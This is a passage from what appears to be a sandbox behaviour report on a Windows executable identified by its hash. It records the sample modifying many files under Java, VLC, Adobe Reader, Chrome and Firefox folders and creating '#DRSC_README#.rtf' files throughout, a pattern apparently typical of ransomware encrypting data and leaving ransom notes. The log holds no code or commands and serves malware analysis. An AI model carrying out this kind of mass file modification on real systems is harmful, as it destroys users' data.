Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\notification_helper.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoDev.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Memo.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\cs.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Accra 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 